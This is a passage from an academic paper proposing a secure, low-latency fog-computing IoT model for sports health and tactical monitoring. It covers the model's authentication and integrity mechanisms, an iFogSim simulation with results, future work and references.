Builder carries out the operations of parsing metadata properties set and network topology to analyze datasets from the packet parsing Karakaya and Akleylek (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.342 19/34 http://dx.doi.org/10.7717/peerj-cs.342 https://peerj.com/computer-science/ phase and create a graph of the network flow topology. The logical and physical topologies of metadata for each flow are stored. The system distinguishes changes, malicious updates, and security strategy violations by looking at the graph of the stream topology created and byte/packet statistics transferred for each flow. � Step 3: The Verifier confirms the metadata according to the management strategies defined by the analyst. It marks the known attacks in line with management strategies. It warns only when it recognizes an unreliable condition, not for every flow. The Migration Agent recognizes attacks like flooding and makes decisions after received alerts. These decisions are added to the reactive rules of the parser. In case of flooding attack, it sends the packets to the Data Plane Cache which is a temporary storage area, to prevent the controller from flooding and overloading. After updating the flow rule, the cached packets are processed. Due to the blockchain-based SDN controller, data changes and flooding attacks are detected in the fog layer (Sharma, Chen & Park, 2017). Thus, data integrity is provided. The SDN controller method can be integrated into the proposed model to ensure data integrity during data transmission from sensors to fog nodes. In the proposed model, the arrived packages in Fig. 9 consist of raw data generated by the sensors. When this method is used, the data flow on the topology is examined before the task management starts in the fog nodes. Thus, data can be supported to reach the fog nodes safely. ANALYSIS OF THE PROPOSED MODEL In this section, the proposed model is analyzed in terms of low latency, data accuracy, authentication and privacy, data integrity and accessibility, bandwidth savings. Low latency Since fog computing is a locally operating mechanism, fog computing and IoT based health and tactical analysis monitoring model in sports have low latency. Thus, rapid intervention, which is very important in health, can be provided. It is also important that data processing and response transmissions are done quickly for technical issues. Research data from an artificial intelligence expert at the STATS analytics company, shows that it is important to take action quickly under a tactically negative situation: “You identify a specific scenario that tends to disrupt the opponent, giving you, say, a 30-s window where the opponent is disorganized” (Burn-Murdoch, 2018). Since the data is processed on fog servers without the Internet, the delay time in transmitting the response is low. In addition, response time and cost are further reduced with the fog task management algorithm based on process priorities (Choudhari, Moh & Moh, 2018). Data on which the response delay time is ignored is encrypted on the fog servers and processed or stored in the remote cloud server. Accuracy of perceived data Correct positions must be taken from players and the ball to carry out tactical analyzes. Linear position sensors are used for this. By determining the positions of each node with Karakaya and Akleylek (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.342 20/34 http://dx.doi.org/10.7717/peerj-cs.342 https://peerj.com/computer-science/ linear position sensors, methods such as Voronoi graph, Delaunay triangle, dominant regions and shading are obtained. These methods help to make tactical analysis. ZigBee network is used for the devices to communicate with each other. The risk of data corruption is reduced due to the reasons such as the coverage of the ZigBee network within the field boundaries and using the AES-128 symmetric encryption structure in it. Therefore, the ZigBee protocol contributes to the accurate acquisition of data. Since the fog nodes are close to the end devices, the fog layer in our model reduces the risk of data corruption due to distance. Authentication and privacy The proposed model uses the FLAT protocol for authentication and data privacy. FLAT is efficient for IoT applications with resource-constrained devices and using fog computing (Santos et al., 2020). In FIdM using cloud computing, the client is directed to IdP after communicating with SP first. However, in the FLAT protocol, the client directly contacts IdP to reduce this cost. In the certificate exchange between SP and IdP, the cost of asymmetric encryption is negligible, since both providers are servers with high computing power. Symmetric switches are assigned to formatted PUF output to clients with limited resources before the system starts processing. Therefore, client-SP and client-IdP communications are secured with symmetric encryption, which is lightweight. In the proposed model, asymmetric and symmetric encryptions are used for authentication and data security, and privacy is also provided. According to the FLAT protocol, since the transported data is encrypted, data content cannot be accessed even if the data is captured in Man-In-The-Middle (MITM) attacks. Also, in order to prevent MITM, digital signatures are verified by exchanging certificates between IdP and SP before sending the shared key to SP. The client’s identity is also verified by IdP using symmetric keys. The attacker cannot obtain the implicit certificate supplied by a legitimate certification authority and the private key of the fog node. Thus, impersonation attacks can be prevented because fog nodes use certificates and signatures. Figure 9 The structure of the blockchain based SDN controller. Full-size DOI: 10.7717/peerj-cs.342/fig-9 Karakaya and Akleylek (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.342 21/34 http://dx.doi.org/10.7717/peerj-cs.342/fig-9 http://dx.doi.org/10.7717/peerj-cs.342 https://peerj.com/computer-science/ Data integrity and accessibility In IoT applications using fog layer, the data perceived from the sensor devices are transmitted from the wireless environments to the fog nodes, so they may have vulnerabilities against attacks. Some security measures (such as encryption) are taken by the ZigBee network and the FLAT method, which is lightweight and secure, is used for authentication. FLAT also supports the protection of data integrity for fog nodes with methods such as digital signature. However, in order to protect the integrity of the data obtained from end nodes, blockchain based SDN controller structure is used in the fog layer. A flow topology graphic is created by parsing the arrived packets. Then, the data verification is performed in Verifier according to defined rules. This method is especially effective against flooding attacks. Packages are stored in the Data Plane Cache to prevent flooding and overloading of the SDN controller. Thus, the system continues to operate without loss of information and overflow. The cached packets are processed after high flow is over. Thus, the SDN controller can detect and warn attacks such as false topology, ARP poisoning and DDos (Sharma, Chen & Park, 2017). With blockchain’s distributed data management, the cost of the system is reduced and its integrity and data security are ensured (Yang, Cha & Song, 2018). Bandwidth savings Implicit certificate structure is used in certificate changes. The implicit certificate, also called the Elliptic Curve Qu-Vanstone (ECQV), is a public key certificate (Santos et al., 2020). Implicit certificates include ID, public key, and digital signature of the certification authority. Since these data are sent as a public key certificate, not separately, the certificate sizes are decreasing. Thus, bandwidth is significantly saved. SIMULATION OF THE PROPOSED MODEL This section includes the detailed simulation of the proposed algorithm using the iFogSim program. Topology The number of nodes in the fog layer and accordingly the topology structure can be changed. The simulation of the proposed algorithm, three fog nodes consisting of two levels are used in the fog layer. In Fig. 10, one of the three nodes is only responsible for communication with the cloud and performs storage tasks. The other two nodes carry out the requests and transmit the results to the actuators. In Fig. 10, the node f-0 represents the numofGateways variable in the simulation, while the nodes f-1 and f-2 represent the numOfEndDevPerGateway variable in the simulation. The nodes s-0, s-1, s-2 and s-3 represent sensors in players and in the field of sports. The t-0 and t-1 nodes represent actuators such as technical team and club doctors. In the simulation, it is assumed that the data obtained from the sensors have successfully passed the security steps and are completely legal data. The simulation includes placing requests on the fog nodes and the proposed resource management algorithm. Karakaya and Akleylek (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.342 22/34 http://dx.doi.org/10.7717/peerj-cs.342 https://peerj.com/computer-science/ Features of fog nodes used in simulation The features of the simulation application is taken as an example from (Buyya & Srirama, 2019). In the simulation, fog nodes are created with Linux operating system, x86 architecture and Xen as virtual machine manager. Additionally, the createFogDevice function is used to create a new fog node. Accordingly, The parameters of this function and the properties of the fog nodes are given in Table 2. Structure of the simulation application Three modules are used in the application as “clientModule”, “mainModule”, “storageModule”. It is assumed that it is placed in the “clientModule” end fog devices and the “storageModule” cloud device. “mainModule” is the starting module. The modules, the names given to the data exchange and the direction of the Tuples used in data transmission are shown in Fig. 11 (Buyya & Srirama, 2019). Figure 10 The topology used in the simulation of the proposed algorithm. Full-size DOI: 10.7717/peerj-cs.342/fig-10 Table 2 Features of fog nodes used in simulation. Features 1.level fog devices 2.level fog devices Mips 2,800 3,200 Ram 4,000 1,000 upBw 10,000 10,000 downBw 10,000 270 Level 1 2 ratePerMips 0 0 busyPower 107.339 87.53 idlePower 83.4333 82.44 Karakaya and Akleylek (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.342 23/34 http://dx.doi.org/10.7717/peerj-cs.342/fig-10 http://dx.doi.org/10.7717/peerj-cs.342 https://peerj.com/computer-science/ The code structure of the simulation application The number of fog nodes can be determined with the variables “numOfGateways” and “numOfEndDevPerGateway” in the “TestApplication.java” file where the main block of the simulation application is located in the iFogSim program. Small values (respectively 1 and 2) are given to these variables to show that the proposed algorithm is fully simulated. The object of the “MyModulePlacement.java” class is called for module placement in the main block in the simulation application. This class is designed according to the proposed algorithm. Since data flow cannot be done with the sensors in the simulation, the requests (mips and time values) are given to the system randomly through a list. These requests, which are assumed to be sorted according to their priorities, are assigned to the fog nodes sequentially according to the proposed algorithm. After each assignment, the list of fog nodes is sorted according to their unused capacity. In a loop, if the request can only be satisfied by one fog node, it is placed at that fog node and the loop breaks. In this case, the module placement process is carried out according to the code in Fig. 12. If the request cannot be assigned to a single fog node, the list of fog nodes is scanned backwards and the capacities of the nodes are summed. If the appropriate capacity is reached, it is distributed across these fog nodes. In this case, the module placement process is carried out according to the code in Fig. 13. If the request cannot be assigned to any fog node (single or distributed), the request is rejected because there is not enough capacity in the fog layer. This process is shown in the code in Fig. 14. Figure 11 Data exchange between modules in simulation. Full-size DOI: 10.7717/peerj-cs.342/fig-11 Karakaya and Akleylek (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.342 24/34 http://dx.doi.org/10.7717/peerj-cs.342/fig-11 http://dx.doi.org/10.7717/peerj-cs.342 https://peerj.com/computer-science/ Figure 12 Module placement executed if the request can only be assigned to a fog node. Full-size DOI: 10.7717/peerj-cs.342/fig-12 Figure 13 Module placement executed if the request could not be assigned to a single fog node. Full-size DOI: 10.7717/peerj-cs.342/fig-13 Figure 14 Process executed when the request is not assigned to the fog layer. Full-size DOI: 10.7717/peerj-cs.342/fig-14 Karakaya and Akleylek (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.342 25/34 http://dx.doi.org/10.7717/peerj-cs.342/fig-12 http://dx.doi.org/10.7717/peerj-cs.342/fig-13 http://dx.doi.org/10.7717/peerj-cs.342/fig-14 http://dx.doi.org/10.7717/peerj-cs.342 https://peerj.com/computer-science/ Results of the simulation application The simulation results according to the randomly generated (1,354, 564, 959, 1,360, 1,287, 1,350, 1,105) (mips) list of requests are shown in Fig. 15. At the same time, a randomly generated deadline is determined for each request. In Fig. 15, numofGateways = 1, numOfEndDevPerGateway = 2 are selected. In the graphics in Fig. 16, the simulation is run by increasing the “numOfEndDevPerGateway” value. In the “Tuple CPU execution delay” heading in Fig. 15, the types and delay times of the Tuples transmitted between modules are shown. Source and target modules and types of requests are given in Table 3. Figure 15 Simulation results of the proposed algorithm. Full-size DOI: 10.7717/peerj-cs.342/fig-15 Karakaya and Akleylek (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.342 26/34 http://dx.doi.org/10.7717/peerj-cs.342/fig-15 http://dx.doi.org/10.7717/peerj-cs.342 https://peerj.com/computer-science/ The area in the node or nodes where the request is placed during the deadline period is reserved for that request. In the simulation, assuming that the placed requests have not yet produced results, the other requests in the queue continue to be placed in fog nodes. In order to show the result of each phase, the number of fog nodes was chosen as 2. For results that occur with more fog nodes, it can be re-run by changing the values of “numOfGateways” and “numOfEndDevPerGateway” in the main block of the simulation application. In Fig. 15, the “RESULTS” part, produced as a standard by the iFogSim program, shows the time spent for the operation of the system, the energy spent and the general cost. Table 3 The flow and types of tuples between modules. Source Destination Tuple Type Direction IoTSensor clientModule IoTSensor UP clientModule mainModule RawData UP mainModule storageModule StoreData UP mainModule clientModule ResultData DOWN clientModule IoTActuator Response DOWN Figure 16 Graphs of the simulation results of the proposed algorithm. Graphs of the simulation results of the proposed algorithm ((A) Execution Time, (B) Total Network Usage, (C) Application Loops Delay Time, (D) Cost of Execution in Cloud). Full-size DOI: 10.7717/peerj-cs.342/fig-16 Karakaya and Akleylek (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.342 27/34 http://dx.doi.org/10.7717/peerj-cs.342/fig-16 http://dx.doi.org/10.7717/peerj-cs.342 https://peerj.com/computer-science/ The graph of Execution Time (a), Total Network Usage (b), Application Loop Delays Time (c), Cost of Execution in Cloud (d) values from the simulation results obtained by changing the number of fog nodes is shown in Fig. 16. As the number of nodes increases, execution time and application loop delay increase. When the number of nodes is 4, high latency occurs in the RawData Tuple. Therefore, execution time and application loop delay are much higher. While the total network usage increases with the number of nodes, it decreases when there are 4 nodes. The high delay of the RawData Tuple does not affect network activities. In addition, the total network usage may vary depending on the request costs. Cloud usage cost is highest when the number of nodes is 2. This situation varies according to the cost values of the requests. Address for simulation codes: github.com/akarakaya/SimApp. Comparison of the proposed model The proposed study is compared with Buyya & Srirama (2019), which shares the simulation codes openly. Both studies are compared using numOfGateways = 1 and numOfEndDevPerGateway = 2 parameters. In addition, the fog nodes with the features in Table 2 are used. The comparison results are shown in Table 4. According to the comparison results, data transmission delay times between modules and network usage are lower in the proposed model. The cloud node costs are higher than the fog node costs. Additional protocols and remote server are used in communication with the cloud nodes. This indicates that fog computing causes lower latency than cloud computing. Therefore, fog computing is used in the proposed algorithm. In Table 4, the values of the proposed model are taken from the result in Fig. 15. If every request in the simulation is supplied by the fog layer in the proposed algorithm (if the situation in Fig. 14 does not occur), the values of the proposed model in Table 4 are much lower. However, this also depends on the size of the requests and the capacity of the fog nodes. CHALLENGES IN WEARABLE TECHNOLOGIES AND FUTURE WORKS This section includes challenges in wearable technologies and some future study suggestions. When wearable device technology is combined with fog computing, this Table 4 Comparison of the proposed algorithm with the related work. Features Buyya & Srirama (2019) The Proposed Algorithm Execution Time 124 647 Total Network Usage 809.3333333334 718.92 Application Loop Delays Time 17.71321428571426 11.443750000001904 Cost of Execution in Cloud 3,407.7379464284923 4,470,494.540625081 Tuple Cpu Executıon Delay (RawData) 4.2317142857143 3.8500000000000364 Tuple Cpu Executıon Delay (ResultData) 0.19075000000002545 0.1625000000003638 Tuple Cpu Executıon Delay (IoTSensor) 0.13125000000002274 0.1312500000003638 Tuple Cpu Executıon Delay (StoreData) 0.12704761904762257 0.19928571428681607 Karakaya and Akleylek (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.342 28/34 https://github.com/akarakaya/SimApp http://dx.doi.org/10.7717/peerj-cs.342 https://peerj.com/computer-science/ integrated structure can be a solution for applications requiring low latency (Fiandrino et al., 2019). However, today there are a lot of challenges with wearable technologies. Therefore, the issue of wearable technologies was not included in this article. Challenges in wearable technologies; � Devices may not be suitable for every user’s body. For this reason, the most appropriate and ergonomic product is tried to be developed according to age groups (Hänsel et al., 2015). � With the interdisciplinary study between psychologists and engineers for new healthcare device designs, the product is addressed in terms of both technological and behavioral change. Since wearable health devices self-diagnosis without medical knowledge may mislead the user, this situation should be handled in the developed wearable products. The future of wearable applications should support not only the development of new analysis algorithms for health data, but also the feedback of users for behavior change (Hänsel et al., 2015). � The size, flexibility and operating requirements of existing chemical sensors used for health perception are difficult to use in applications as they are not compatible with wearable technology (Bandodkar, Jeerapan & Wang, 2016). Existing wearable devices do not meet the requirements due to their low power supplies, low energy density and slow charging. There are also major challenges in processing and securing the large data produced by wearable sensors. New generation cryptographic algorithms need to be developed to ensure data security and user privacy (Bandodkar, Jeerapan & Wang, 2016). Some future study suggestions: � Wearable technologies have not yet reached the desired levels in terms of size, capacity, energy consumption, watertightness, high data processing, and security. For this reason, wearable technologies that are suitable for players and spectators, provide accurate data and are not affected by external factors such as sweat can be developed for sports applications. � Lightweight and strong encryption and authentication methods can be developed for IoT and fog computing applications. � Consensus algorithms that are efficient on resource-constrained devices can be developed for blockchain-based IoT applications. � Lightweight and safe IoT models can be developed for different areas similar to the health and tactical analysis monitoring model in the sports we proposed. � Although the elliptic curve encryption system uses smaller keys, it provides similar security with RSA. It is based on the discrete logarithm problem. The ECC-based authentication models have been designed to prevent many attacks (Islam & Biswas, 2013). Similar to ECQV implicit certificate method, post-quantum cryptographic protocols can be developed. Karakaya and Akleylek (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.342 29/34 http://dx.doi.org/10.7717/peerj-cs.342 https://peerj.com/computer-science/ � Communication of IoT nodes, gateways, fog nodes, cloud nodes should be secure. All IoT systems are affected by post-quantum security due to the needs of IoT systems such as privacy, authentication, integrity (Fernández-Caramés, 2019). Therefore, quantum-resistant schemes based on post-quantum cryptographic algorithm can be developed for IoT and cloud systems. � Authentication protocol based on post-quantum cryptography has been developed. This protocol, called LB-2PAKA, was analyzed in a random oracle model to measure provable security and to estimate the breaching time (Islam, 2020) Protocols based on post-quantum cryptography can be developed for IoT applications. � In Akleylek et al. (2019), post-quantum identification scheme was proposed in IoT applications. Various polar forms of multivariate quadratic and cubic polynomial systems was used in this scheme. In Akleylek & Seyhan (2020), an authenticated key exchange approach based on the Bi-GISIS problem was proposed for post-quantum secure. Similarly, identification and authenticated key exchange methods based on post-quantum cryptography can be developed for IoT applications. CONCLUSION In this study, a light and safe fog-based IoT model is proposed in which the result obtained by analyzing the health and tactical data in sports is reported to the technical team and club doctors. In the proposed model, it is ensured that the responses to the end nodes are transmitted with low latency, and the data is processed and stored without the Internet. Urgent processes are given high priority with the priority queue method in the fog nodes. In this article, a resource management algorithm using priority queue method is recommended in the fog nodes. The algorithm is simulated using the iFogSim simulation tool. Simulation results and comparisons with a similar study show that resource allocation and data processing in the fog nodes are performed with low latency. In similar studies in sports, IoT applications are generally designed using only cloud computing. Only health monitoring systems are covered. However, in the proposed model, fog computing is used for data processing and storage. Thus, a higher performance architecture is created in terms of both security and low latency. In the proposed model, not only health monitoring status, but also tactical analyzes in the field are discussed. Thus, the technical team and the club doctors are warned in a short time against possible negative results. For authentication, FLAT protocol, a lightweight authentication protocol, is used in resource-restricted devices. Thanks to the implicit certificates in the FLAT protocol, significant savings in bandwidth can be achieved. In addition to authentication, this protocol provides data privacy. It also helps with data integrity in the fog layer. With the blockchain-based SDN controller structure, some attacks are detected and data integrity is provided. In the event of a flooding attack, data packets are stored in the cache and processed later to prevent flooding and overloading of the fog node. A lightweight and safe model is proposed for monitoring health and tactical analysis in sports. The proposed algorithm has been simulated and comparison results are given. Karakaya and Akleylek (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.342 30/34 http://dx.doi.org/10.7717/peerj-cs.342 https://peerj.com/computer-science/ In the future; studies on artificial intelligence methods that use the proposed model and perform health and tactical analysis in fog nodes are planned. ADDITIONAL INFORMATION AND DECLARATIONS Funding The authors received no funding for this work. Competing Interests Sedat Akleylek is an Academic Editor for PeerJ. Author Contributions � Aykut Karakaya conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � Sedat Akleylek conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. Data Availability The following information was supplied regarding data availability: The simulation application codes are available at GitHub: https://github.com/akarakaya/SimApp. REFERENCES Abdulkareem KH, Mohammed MA, Gunasekaran SS, Al-Mhiqani MN, Mutlag AA, Mostafa SA, Ali NS, Ibrahim DA. 2019. A review of fog computing and machine learning: concepts, applications, challenges, and open issues. IEEE Access 7:153123–153140 DOI 10.1109/ACCESS.2019.2947542. Akleylek S, Seyhan K. 2020. A probably secure bi-gisis based modified ake scheme with reusable keys. IEEE Access 8:26210–26222 DOI 10.1109/ACCESS.2020.2970537. Akleylek S, Soysald M, Boubiche DE, Toral-Cruz H. 2019. A novel method for polar form of any degree of multivariate polynomials with applications in iot. Sensors 19(4):903 DOI 10.3390/s19040903. Alameddine HA, Sharafeddine S, Sebbah S, Ayoubi S, Assi C. 2019. Dynamic task offloading and scheduling for low-latency iot services in multi-access edge computing. IEEE Journal on Selected Areas in Communications 37(3):668–682 DOI 10.1109/JSAC.2019.2894306. Alrawais A, Alhothaily A, Hu C, Cheng X. 2017. Fog computing for the internet of things: security and privacy issues. IEEE Internet Computing 21(2):34–42 DOI 10.1109/MIC.2017.37. Baca A, Kornfeind P. 2006. Rapid feedback systems for elite sports training. IEEE Pervasive Computing 5(4):70–76 DOI 10.1109/MPRV.2006.82. Bandodkar AJ, Jeerapan I, Wang J. 2016. Wearable chemical sensors: present challenges and future prospects. ACS Sensors 1(5):464–482 DOI 10.1021/acssensors.6b00250. Basu S, Karuppiah M, Selvakumar K, Li K-C, Islam SH, Hassan MM, Bhuiyan MZA. 2018. An intelligent/cognitive model of task scheduling for iot applications in cloud computing Karakaya and Akleylek (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.342 31/34 https://github.com/akarakaya/SimApp http://dx.doi.org/10.1109/ACCESS.2019.2947542 http://dx.doi.org/10.1109/ACCESS.2020.2970537 http://dx.doi.org/10.3390/s19040903 http://dx.doi.org/10.1109/JSAC.2019.2894306 http://dx.doi.org/10.1109/MIC.2017.37 http://dx.doi.org/10.1109/MPRV.2006.82 http://dx.doi.org/10.1021/acssensors.6b00250 http://dx.doi.org/10.7717/peerj-cs.342 https://peerj.com/computer-science/ environment. Future Generation Computer Systems 88(2):254–261 DOI 10.1016/j.future.2018.05.056. Bonomi F, Milito R, Zhu J, Addepalli S. 2012. Fog computing and its role in the internet of things. In: Proceedings of the First Edition of the MCC Workshop on Mobile Cloud Computing. 13–16. Bormann C, Ersue M, Keranen A. 2014. Terminology for constrained-node networks. In: Internet Engineering Task Force (IETF), Fremont, CA, USA. Burn-Murdoch J. 2018. How data analysis helps football clubs make better signings. Available at https://www.ft.com/content/84aa8b5e-c1a9-11e8-84cd-9e601db069b8. Buyya R, Srirama SN. 2019. Modelling and simulation of fog and edge computing environments using ifogsim toolkit. In: Fog and Edge Computing: Principles and Paradigms. Hoboken: Wiley, 433–465 DOI 10.1002/9781119525080.ch17. Choudhari T, Moh M, Moh T-S. 2018. Prioritized task scheduling in fog computing. In: Proceedings of the ACMSE, 2018 Conference. 1–8. Cisco. 2015. Fog computing and the internet of things: extend the cloud to where the things are. Available at https://www.cisco.com/c/dam/en_us/solutions/trends/iot/docs/computing-overview. pdf. Fang W, Zhou W, Li Y, Yao X, Xue F, Xiong N. 2018. A distributed admm approach for energy-efficient resource allocation in mobile edge computing. Turkish Journal of Electrical Engineering & Computer Sciences 26(6):3335–3344. Fernández-Caramés TM. 2019. From pre-quantum to post-quantum iot security: a survey on quantum-resistant cryptosystems for the internet of things. IEEE Internet of Things Journal 7(7):6457–6480 DOI 10.1109/JIOT.2019.2958788. Fiandrino C, Allio N, Kliazovich D, Giaccone P, Bouvry P. 2019. Profiling performance of application partitioning for wearable devices in mobile cloud and fog computing. IEEE Access 7:12156–12166 DOI 10.1109/ACCESS.2019.2892508. Habibi P, Farhoudi M, Kazemian S, Khorsandi S, Leon-Garcia A. 2020. Fog computing: a comprehensive architectural survey. IEEE Access 8:69105–69133 DOI 10.1109/ACCESS.2020.2983253. Hänsel K, Wilde N, Haddadi H, Alomainy A. 2015. Challenges with current wearable technology in monitoring health data and providing positive behavioural support. In: Proceedings of the 5th EAI International Conference on Wireless Mobile Communication and Healthcare, 158–161. Heydari G, Rahbari D, Nickray M. 2019. Energy saving scheduling in a fog-based iot application by bayesian task classification approach. Turkish Journal of Electrical Engineering & Computer Sciences 27(6):4167–4187 DOI 10.3906/elk-1902-152. Horton M, Gudmundsson J, Chawla S, Estephan J. 2015. Automated classification of passing in football. In: Cao T, Lim E-P, Zhou Z-H, Ho T-B, Cheung D, Motoda H, eds. Advances in Knowledge Discovery and Data Mining. Cham: Springer International Publishing, 319–330. Ikram MA, Alshehri MD, Hussain FK. 2015. Architecture of an iot-based system for football supervision (iot football). In: 2015 IEEE 2nd World Forum on Internet of Things (WF-IoT), Piscataway: IEEE, 69–74. Iqbal S, Malik AW, Rahman AU, Noor RM. 2020. Blockchain-based reputation management for task offloading in micro-level vehicular fog network. IEEE Access 8:52968–52980 DOI 10.1109/ACCESS.2020.2979248. Islam SH. 2020. Provably secure two-party authenticated key agreement protocol for post-quantum environments. Journal of Information Security and Applications 52(6):102468 DOI 10.1016/j.jisa.2020.102468. Karakaya and Akleylek (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.342 32/34 http://dx.doi.org/10.1016/j.future.2018.05.056 https://www.ft.com/content/84aa8b5e-c1a9-11e8-84cd-9e601db069b8 http://dx.doi.org/10.1002/9781119525080.ch17 https://www.cisco.com/c/dam/en_us/solutions/trends/iot/docs/computing-overview.pdf https://www.cisco.com/c/dam/en_us/solutions/trends/iot/docs/computing-overview.pdf http://dx.doi.org/10.1109/JIOT.2019.2958788 http://dx.doi.org/10.1109/ACCESS.2019.2892508 http://dx.doi.org/10.1109/ACCESS.2020.2983253 http://dx.doi.org/10.3906/elk-1902-152 http://dx.doi.org/10.1109/ACCESS.2020.2979248 http://dx.doi.org/10.1016/j.jisa.2020.102468 http://dx.doi.org/10.7717/peerj-cs.342 https://peerj.com/computer-science/ Islam SH, Biswas G. 2013. Design of improved password authentication and update scheme based on elliptic curve cryptography. Mathematical and Computer Modelling 57(11–12):2703–2717 DOI 10.1016/j.mcm.2011.07.001. Krishnan P, Duttagupta S, Achuthan K. 2020. Sdn/nfv security framework for fog-to-things computing infrastructure. Software: Practice and Experience 50(5):757–800 DOI 10.1002/spe.2761. Kuang Z, Li L, Gao J, Zhao L, Liu A. 2019. Partial offloading scheduling and power allocation for mobile edge computing systems. IEEE Internet of Things Journal 6(4):6774–6785 DOI 10.1109/JIOT.2019.2911455. Kubler S, Robert J, Hefnawy A, Främling K, Cherifi C, Bouras A. 2017. Open iot ecosystem for sporting event management. IEEE Access 5:7064–7079 DOI 10.1109/ACCESS.2017.2692247. Li H, Jia Z, Xue X. 2010. Application and analysis of zigbee security services specification. 2010 Second International Conference on Networks Security, Wireless Communications and Trusted Computing 2:494–497. Liu W, Nishio T, Shinkuma R, Takahashi T. 2014. Adaptive resource discovery in mobile cloud computing. Computer Communications 50(2):119–129 DOI 10.1016/j.comcom.2014.02.006. Luan TH, Gao L, Li Z, Xiang Y, Wei G, Sun L. 2015. Fog computing: focusing on mobile users at the edge. Available at https://arxiv.org/abs/1502.01815. Madsen H, Burtschy B, Albeanu G, Popentiu-Vladicescu F. 2013. Reliability in the utility computing era: towards reliable fog computing. In: 2013 20th International Conference on Systems, Signals and Image Processing (IWSSIP), Piscataway: IEEE, 43–46. Mouradian C, Kianpisheh S, Abu-Lebdeh M, Ebrahimnezhad F, Jahromi NT, Glitho RH. 2019. Application component placement in nfv-based hybrid cloud/fog systems with mobile fog nodes. IEEE Journal on Selected Areas in Communications 37(5):1130–1143 DOI 10.1109/JSAC.2019.2906790. Mukherjee M, Matam R, Shu L, Maglaras L, Ferrag MA, Choudhury N, Kumar V. 2017. Security and privacy in fog computing: challenges. IEEE Access 5:19293–19304 DOI 10.1109/ACCESS.2017.2749422. Naha RK, Garg S, Georgakopoulos D, Jayaraman PP, Gao L, Xiang Y, Ranjan R. 2018. Fog computing: survey of trends, architectures, requirements, and research directions. IEEE Access 6:47980–48009 DOI 10.1109/ACCESS.2018.2866491. Niu X, Shao S, Xin C, Zhou J, Guo S, Chen X, Qi F. 2019. Workload allocation mechanism for minimum service delay in edge computing-based power internet of things. IEEE Access 7:83771–83784 DOI 10.1109/ACCESS.2019.2920325. Nofer M, Gomber P, Hinz O, Schiereck D. 2017. Blockchain. Business & Information Systems Engineering 59(3):183–187 DOI 10.1007/s12599-017-0467-3. Okay FY, Ozdemir S. 2018. Routing in fog-enabled iot platforms: a survey and an sdn-based solution. IEEE Internet of Things Journal 5(6):4871–4889 DOI 10.1109/JIOT.2018.2882781. Paul A, Pinjari H, Hong W-H, Seo HC, Rho S. 2018. Fog computing-based iot for health monitoring system. Journal of Sensors 2018(2):1–7 DOI 10.1155/2018/1386470. Pfisterer D, Lipphardt M, Buschmann C, Hellbrueck H, Fischer S, Sauselin JH. 2006. Marathonnet: adding value to large scale sport events-a connectivity analysis. In: Proceedings of the First International Conference on Integrated Internet Ad Hoc and Sensor networks, 12. Rahbari D, Nickray M. 2019. Low-latency and energy-efficient scheduling in fog-based iot applications. Turkish Journal of Electrical Engineering & Computer Sciences 27(2):1406–1427 DOI 10.3906/elk-1810-47. Karakaya and Akleylek (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.342 33/34 http://dx.doi.org/10.1016/j.mcm.2011.07.001 http://dx.doi.org/10.1002/spe.2761 http://dx.doi.org/10.1109/JIOT.2019.2911455 http://dx.doi.org/10.1109/ACCESS.2017.2692247 http://dx.doi.org/10.1016/j.comcom.2014.02.006 https://arxiv.org/abs/1502.01815 http://dx.doi.org/10.1109/JSAC.2019.2906790 http://dx.doi.org/10.1109/ACCESS.2017.2749422 http://dx.doi.org/10.1109/ACCESS.2018.2866491 http://dx.doi.org/10.1109/ACCESS.2019.2920325 http://dx.doi.org/10.1007/s12599-017-0467-3 http://dx.doi.org/10.1109/JIOT.2018.2882781 http://dx.doi.org/10.1155/2018/1386470 http://dx.doi.org/10.3906/elk-1810-47 http://dx.doi.org/10.7717/peerj-cs.342 https://peerj.com/computer-science/ Roman R, Lopez J, Mambo M. 2018. Mobile edge computing, Fog et al.: a survey and analysis of security threats and challenges. Future Generation Computer Systems 78(4):680–698 DOI 10.1016/j.future.2016.11.009. Santos ML, Carneiro JC, Franco AM, Teixeira FA, Henriques MA, Oliveira LB. 2020. Flat: federated lightweight authentication for the internet of things. Ad Hoc Networks 107(15):102253 DOI 10.1016/j.adhoc.2020.102253. Sharma PK, Chen M-Y, Park JH. 2017. A software defined fog node based distributed blockchain cloud architecture for iot. IEEE Access 6:115–124 DOI 10.1109/ACCESS.2017.2757955. Shelby Z, Hartke K, Bormann C. 2014. The constrained application protocol (coap). Available at https://tools.ietf.org/html/rfc7252. Soni P, Pal AK, Islam SH. 2019. An improved three-factor authentication scheme for patient monitoring using wsn in remote health-care system. Computer Methods and Programs in Biomedicine 182(1):105054 DOI 10.1016/j.cmpb.2019.105054. Taki T, Hasegawa J-i. 2000. Visualization of dominant region in team games and its application to teamwork analysis. In: Proceedings Computer Graphics International 2000, Piscataway: IEEE, 227–235. Vales-Alonso J, López-Matencio P, Gonzalez-Castaño FJ, Navarro-Helln H, Baños-Guirao PJ, Pérez-Martnez FJ, Martnez-Álvarez RP, González-Jiménez D, Gil-Castiñeira F, Duro-Fernández R. 2010. Ambient intelligence systems for personalized sport training. Sensors 10(3):2359–2385 DOI 10.3390/s100302359. Wang X, Chen M, Taleb T, Ksentini A, Leung VC. 2014. Cache in the air: exploiting content caching and delivery techniques for 5g systems. IEEE Communications Magazine 52(2):131–139 DOI 10.1109/MCOM.2014.6736753. Wazid M, Das AK, Shetty S, Jo M. 2020. A tutorial and future research for building a blockchain-based secure communication scheme for internet of intelligent things. IEEE Access 